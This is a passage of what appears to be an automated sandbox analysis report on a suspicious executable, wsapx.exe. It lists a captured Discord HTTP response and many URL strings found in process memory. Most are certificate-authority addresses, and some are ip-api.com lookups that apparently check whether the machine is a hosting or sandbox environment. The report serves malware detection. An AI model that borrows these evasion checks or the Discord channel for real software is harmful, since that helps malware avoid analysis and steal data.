HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:38:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075487x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4lllrWnMiPrHeZ3hKh5y1SCJz5d9pCBQSw7m1rePD9qkRF5P0A8nYrAcLtSpqV726obINY31CIdI6NlQG1V3pMGyA5tVsJ8lUVZq%2FmobiLUJ8quIRCmHsarj%2BDaQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=4a3d3e501b1e2428812603716b0f256d8644b9af-1734075486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=9cJeKDbCz.ZFeL4K6jS.s_pRajFY0tKlwFpKAskX.VA-1734075486542-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f144ae79dee7d26-EWR

Source: wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi6
Source: wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co6
Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wsapx.exe, 00000002.00000002.2653951316.000001C879FFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2656467781.000001C87AA63000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2326531713.000001C879FF4000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C879FF3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652665034.000001C879A30000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651244199.000001C877C51000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2363604883.000001C87A000000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2644095050.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2334422386.000001C879FF4000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650218345.000001C879FFE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2296799517.000002A243070000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3404575723.00000266ED200000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2508081777.000001FAEB640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000017.00000002.3404575723.00000266ED200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _hashlib.pyd.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: edb.log.23.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingrz
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingrzr
Source: powershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 